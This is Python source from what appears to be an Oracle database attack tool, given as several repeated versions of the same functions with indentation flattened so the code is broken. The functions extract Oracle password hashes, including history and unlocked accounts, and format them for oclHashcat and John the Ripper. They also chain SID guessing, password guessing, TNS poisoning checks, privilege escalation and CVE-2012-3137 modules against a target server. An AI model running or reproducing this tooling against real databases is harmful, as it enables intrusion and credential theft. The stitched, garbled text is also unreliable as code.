def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","info","get-passwords","get-passwords-from-history"]) == False : return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) if args.has_key('info')==False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True : args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True : args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True : args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","get-passwords","get-passwords-from-history"]) == False : return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) if args.has_key('info')==False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True : args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True : args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True : args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","get-passwords","get-passwords-from-history", "get-passwords-not-locked"]) == False : return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) passwords.__getLockedUsernames__() if args.has_key('info')==False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True : args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True : args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords (some accounts can be locked):") passwords.printPasswords() args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):") passwords.printPasswordsOclHashcat() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-not-locked'] == True : args['print'].title("Try to get Oracle hashed passwords when the account is not locked") blacklistOfUsernames = passwords.__getLockedUsernames__() status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames) if status == True : args['print'].goodNews("Here are Oracle hashed passwords (all accounts are opened, not locked):") passwords.printPasswords() args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):") passwords.printPasswordsOclHashcat() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True : args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
def runAllModules(args): ''' Run all modules ''' connectionInformation, validSIDsList = {}, [] #A)SID MANAGEMENT if args['sid'] == None : validSIDsList = runSIDGuesserModule(args) args['user'], args['password'] = None, None else : validSIDsList = [args['sid']] #B)ACCOUNT MANAGEMENT if args['user'] == None and args['password'] == None: for sid in validSIDsList: args['print'].title("Searching valid accounts on the {0} SID".format(sid)) args['sid'] = sid passwordGuesser = PasswordGuesser(args,args['accounts-file']) passwordGuesser.searchValideAccounts() validAccountsList = passwordGuesser.valideAccounts if validAccountsList == {}: args['print'].badNews("No found a valid account on {0}:{1}/{2}".format(args['server'], args['port'], args['sid'])) exit(EXIT_NO_ACCOUNTS) else : args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'],validAccountsList)) for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(sid) == False: connectionInformation[sid] = [[aLogin,aPassword]] else : connectionInformation[sid].append([aLogin,aPassword]) else : validAccountsList = {args['user']:args['password']} for aSid in validSIDsList: for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[aLogin,aPassword]] else : connectionInformation[aSid].append([aLogin,aPassword]) #C)ALL OTHERS MODULES if sidHasBeenGiven(args) == False : return EXIT_MISS_ARGUMENT elif anAccountIsGiven(args) == False : return EXIT_MISS_ARGUMENT for aSid in connectionInformation.keys(): for loginAndPass in connectionInformation[aSid]: args['sid'] , args['user'], args['password'] = aSid, loginAndPass[0],loginAndPass[1] args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'],args['user'],args['password'])) #INFO ABOUT REMOTE SERVER info = Info(args) status = info.connection() if isinstance(status,Exception): args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n',''))) break info.loadInformationRemoteDatabase() args['info'] = info #UTL_HTTP utlHttp = UtlHttp(args) status = utlHttp.connection() utlHttp.testAll() #HTTPURITYPE httpUriType = HttpUriType(args) httpUriType.testAll() #UTL_FILE utlFile = UtlFile(args) utlFile.testAll() #JAVA java = Java(args) java.testAll() #DBMS ADVISOR dbmsAdvisor = DbmsAdvisor(args) dbmsAdvisor.testAll() #DBMS Scheduler dbmsScheduler = DbmsScheduler(args) dbmsScheduler.testAll() #CTXSYS ctxsys = Ctxsys(args) ctxsys.testAll() #Passwords passwords = Passwords(args) passwords.testAll() #DbmsXmldom dbmsXslprocessor = DbmsXslprocessor(args) dbmsXslprocessor.testAll() #External Table externalTable = ExternalTable(args) externalTable.testAll() #Oradbg oradbg = Oradbg(args) oradbg.testAll() oradbg.close() #Close the socket to the remote database #CVE_2012_3137 cve = CVE_2012_3137 (args) cve.testAll() #usernamelikepassword args['run'] = True runUsernameLikePassword(args)
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args, [ "test-module", "get-passwords", "get-passwords-from-history", "get-passwords-not-locked" ]) == False: return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) passwords.__getLockedUsernames__() if args.has_key('info') == False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True: args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True: args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True: args['print'].goodNews( "Here are Oracle hashed passwords (some accounts can be locked):" ) passwords.printPasswords() args['print'].goodNews( "Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):" ) passwords.printPasswordsOclHashcat() args['print'].goodNews( "Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):" ) passwords.printPasswordsJohn() else: args['print'].badNews( "Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-not-locked'] == True: args['print'].title( "Try to get Oracle hashed passwords when the account is not locked" ) blacklistOfUsernames = passwords.__getLockedUsernames__() status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames) if status == True: args['print'].goodNews( "Here are Oracle hashed passwords (all accounts are opened, not locked):" ) passwords.printPasswords() args['print'].goodNews( "Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):" ) passwords.printPasswordsOclHashcat() args['print'].goodNews( "Here are 10g Oracle hashed passwords for John the Ripper (all accounts are opened, not locked):" ) passwords.printPasswordsJohn() else: args['print'].badNews( "Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True: args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True: args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else: args['print'].badNews( "Impossible to get hashed passwords from history: {0}".format( status))
def runAllModules(args): ''' Run all modules ''' connectionInformation, validSIDsList = {}, [] #0)TNS Poinsoning if args['no-tns-poisoning-check'] == False: tnspoison = Tnspoison(args) tnspoison.testAll() else: logging.info("Don't check if the target is vulnerable to TNS poisoning because the option --no-tns-poisoning-check is enabled in command line") #A)SID MANAGEMENT if args['sid'] == None : logging.debug("Searching valid SIDs") validSIDsList = runSIDGuesserModule(args) args['user'], args['password'] = None, None else : validSIDsList = [args['sid']] if validSIDsList == []: exit(EXIT_NO_SIDS) #B)ACCOUNT MANAGEMENT if args['credentialsFile'] == True : logging.debug("Loading credentials stored in the {0} file".format(args['accounts-file'])) #Load accounts from file passwordGuesser = PasswordGuesser(args, args['accounts-file'], loginFile=None ,passwordFile=None, loginAsPwd=args['login-as-pwd']) validAccountsList = passwordGuesser.getAccountsFromFile() for aSid in validSIDsList: for anAccount in validAccountsList: if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[anAccount[0], anAccount[1]]] else : connectionInformation[aSid].append([anAccount[0], anAccount[1]]) elif args['user'] == None and args['password'] == None: for sid in validSIDsList: args['print'].title("Searching valid accounts on the {0} SID".format(sid)) args['sid'] = sid if args['accounts-files'][0] != None and args['accounts-files'][1] != None : args['accounts-file'] = None passwordGuesser = PasswordGuesser(args, accountsFile=args['accounts-file'], loginFile=args['accounts-files'][0], passwordFile=args['accounts-files'][1], timeSleep=args['timeSleep'], loginAsPwd=args['login-as-pwd']) passwordGuesser.searchValideAccounts() validAccountsList = passwordGuesser.valideAccounts if validAccountsList == {}: args['print'].badNews("No found a valid account on {0}:{1}/{2}. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-file accounts/logins.txt accounts/pwds.txt'".format(args['server'], args['port'], args['sid'])) exit(EXIT_NO_ACCOUNTS) else : args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'],getCredentialsFormated(validAccountsList))) for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(sid) == False: connectionInformation[sid] = [[aLogin,aPassword]] else : connectionInformation[sid].append([aLogin,aPassword]) else: validAccountsList = {args['user']:args['password']} for aSid in validSIDsList: for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[aLogin,aPassword]] else : connectionInformation[aSid].append([aLogin,aPassword]) #C)ALL OTHERS MODULES if sidHasBeenGiven(args) == False : return EXIT_MISS_ARGUMENT #elif anAccountIsGiven(args) == False : return EXIT_MISS_ARGUMENT for aSid in connectionInformation.keys(): for loginAndPass in connectionInformation[aSid]: args['sid'] , args['user'], args['password'] = aSid, loginAndPass[0],loginAndPass[1] args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'],args['user'],args['password'])) #INFO ABOUT REMOTE SERVER info = Info(args) status = info.connection() if isinstance(status,Exception): args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n',''))) break info.loadInformationRemoteDatabase() args['info'] = info #UTL_HTTP utlHttp = UtlHttp(args) status = utlHttp.connection() utlHttp.testAll() #HTTPURITYPE httpUriType = HttpUriType(args) httpUriType.testAll() #UTL_FILE utlFile = UtlFile(args) utlFile.testAll() #JAVA java = Java(args) java.testAll() #DBMS ADVISOR dbmsAdvisor = DbmsAdvisor(args) dbmsAdvisor.testAll() #DBMS Scheduler dbmsScheduler = DbmsScheduler(args) dbmsScheduler.testAll() #CTXSYS ctxsys = Ctxsys(args) ctxsys.testAll() #Passwords passwords = Passwords(args) passwords.testAll() #DbmsXmldom dbmsXslprocessor = DbmsXslprocessor(args) dbmsXslprocessor.testAll() #External Table externalTable = ExternalTable(args) externalTable.testAll() #Oradbg oradbg = Oradbg(args) oradbg.testAll() #DbmsLob dbmsLob = DbmsLob(args) dbmsLob.testAll() #SMB smb = SMB(args) smb.testAll() #Pribvilege escalation privilegeEscalation = PrivilegeEscalation(args) privilegeEscalation.testAll() #Test some CVE cve = CVE_XXXX_YYYY(args) cve.testAll() cve.close() #Close the socket to the remote database #CVE_2012_3137 cve = CVE_2012_3137 (args) cve.testAll() #usernamelikepassword args['run'] = True runUsernameLikePassword(args)
def runAllModules(args): ''' Run all modules ''' connectionInformation, validSIDsList = {}, [] #0)TNS Poinsoning if args['no-tns-poisoning-check'] == False: tnspoison = Tnspoison(args) tnspoison.testAll() else: logging.info("Don't check if the target is vulnerable to TNS poisoning because the option --no-tns-poisoning-check is enabled in command line") #A)SID MANAGEMENT if args['sid'] == None : logging.debug("Searching valid SIDs") validSIDsList = runSIDGuesserModule(args) args['user'], args['password'] = None, None else : validSIDsList = [args['sid']] if validSIDsList == []: exit(EXIT_NO_SIDS) #B)ACCOUNT MANAGEMENT if args['credentialsFile'] == True : logging.debug("Loading credentials stored in the {0} file".format(args['accounts-file'])) #Load accounts from file passwordGuesser = PasswordGuesser(args, args['accounts-file'], loginFile=None ,passwordFile=None, loginAsPwd=args['login-as-pwd']) validAccountsList = passwordGuesser.getAccountsFromFile() for aSid in validSIDsList: for anAccount in validAccountsList: if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[anAccount[0], anAccount[1]]] else : connectionInformation[aSid].append([anAccount[0], anAccount[1]]) elif args['user'] == None and args['password'] == None: for sid in validSIDsList: args['print'].title("Searching valid accounts on the {0} SID".format(sid)) args['sid'] = sid if args['accounts-files'][0] != None and args['accounts-files'][1] != None : args['accounts-file'] = None passwordGuesser = PasswordGuesser(args, accountsFile=args['accounts-file'], loginFile=args['accounts-files'][0], passwordFile=args['accounts-files'][1], timeSleep=args['timeSleep'], loginAsPwd=args['login-as-pwd']) passwordGuesser.searchValideAccounts() validAccountsList = passwordGuesser.valideAccounts if validAccountsList == {}: args['print'].badNews("No found a valid account on {0}:{1}/{2}. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-file accounts/logins.txt accounts/pwds.txt'".format(args['server'], args['port'], args['sid'])) exit(EXIT_NO_ACCOUNTS) else : args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'],getCredentialsFormated(validAccountsList))) for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(sid) == False: connectionInformation[sid] = [[aLogin,aPassword]] else : connectionInformation[sid].append([aLogin,aPassword]) else: validAccountsList = {args['user']:args['password']} for aSid in validSIDsList: for aLogin, aPassword in validAccountsList.items(): if connectionInformation.has_key(aSid) == False: connectionInformation[aSid] = [[aLogin,aPassword]] else : connectionInformation[aSid].append([aLogin,aPassword]) #C)ALL OTHERS MODULES if sidHasBeenGiven(args) == False : return EXIT_MISS_ARGUMENT #elif anAccountIsGiven(args) == False : return EXIT_MISS_ARGUMENT for aSid in connectionInformation.keys(): for loginAndPass in connectionInformation[aSid]: args['sid'] , args['user'], args['password'] = aSid, loginAndPass[0],loginAndPass[1] args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'],args['user'],args['password'])) #INFO ABOUT REMOTE SERVER info = Info(args) status = info.connection() if isinstance(status,Exception): args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n',''))) break info.loadInformationRemoteDatabase() args['info'] = info #UTL_HTTP utlHttp = UtlHttp(args) status = utlHttp.connection() utlHttp.testAll() #HTTPURITYPE httpUriType = HttpUriType(args) httpUriType.testAll() #UTL_FILE utlFile = UtlFile(args) utlFile.testAll() #JAVA java = Java(args) java.testAll() #DBMS ADVISOR dbmsAdvisor = DbmsAdvisor(args) dbmsAdvisor.testAll() #DBMS Scheduler dbmsScheduler = DbmsScheduler(args) dbmsScheduler.testAll() #CTXSYS ctxsys = Ctxsys(args) ctxsys.testAll() #Passwords passwords = Passwords(args) passwords.testAll() #DbmsXmldom dbmsXslprocessor = DbmsXslprocessor(args) dbmsXslprocessor.testAll() #External Table externalTable = ExternalTable(args) externalTable.testAll() #Oradbg oradbg = Oradbg(args) oradbg.testAll() #DbmsLob dbmsLob = DbmsLob(args) dbmsLob.testAll() #SMB smb = SMB(args) smb.testAll() #Pribvilege escalation privilegeEscalation = PrivilegeEscalation(args) privilegeEscalation.testAll() #Test some CVE cve = CVE_XXXX_YYYY(args) cve.testAll() cve.close() #Close the socket to the remote database #CVE_2012_3137 cve = CVE_2012_3137 (args) cve.testAll() #usernamelikepassword args['run'] = True runUsernameLikePassword(args)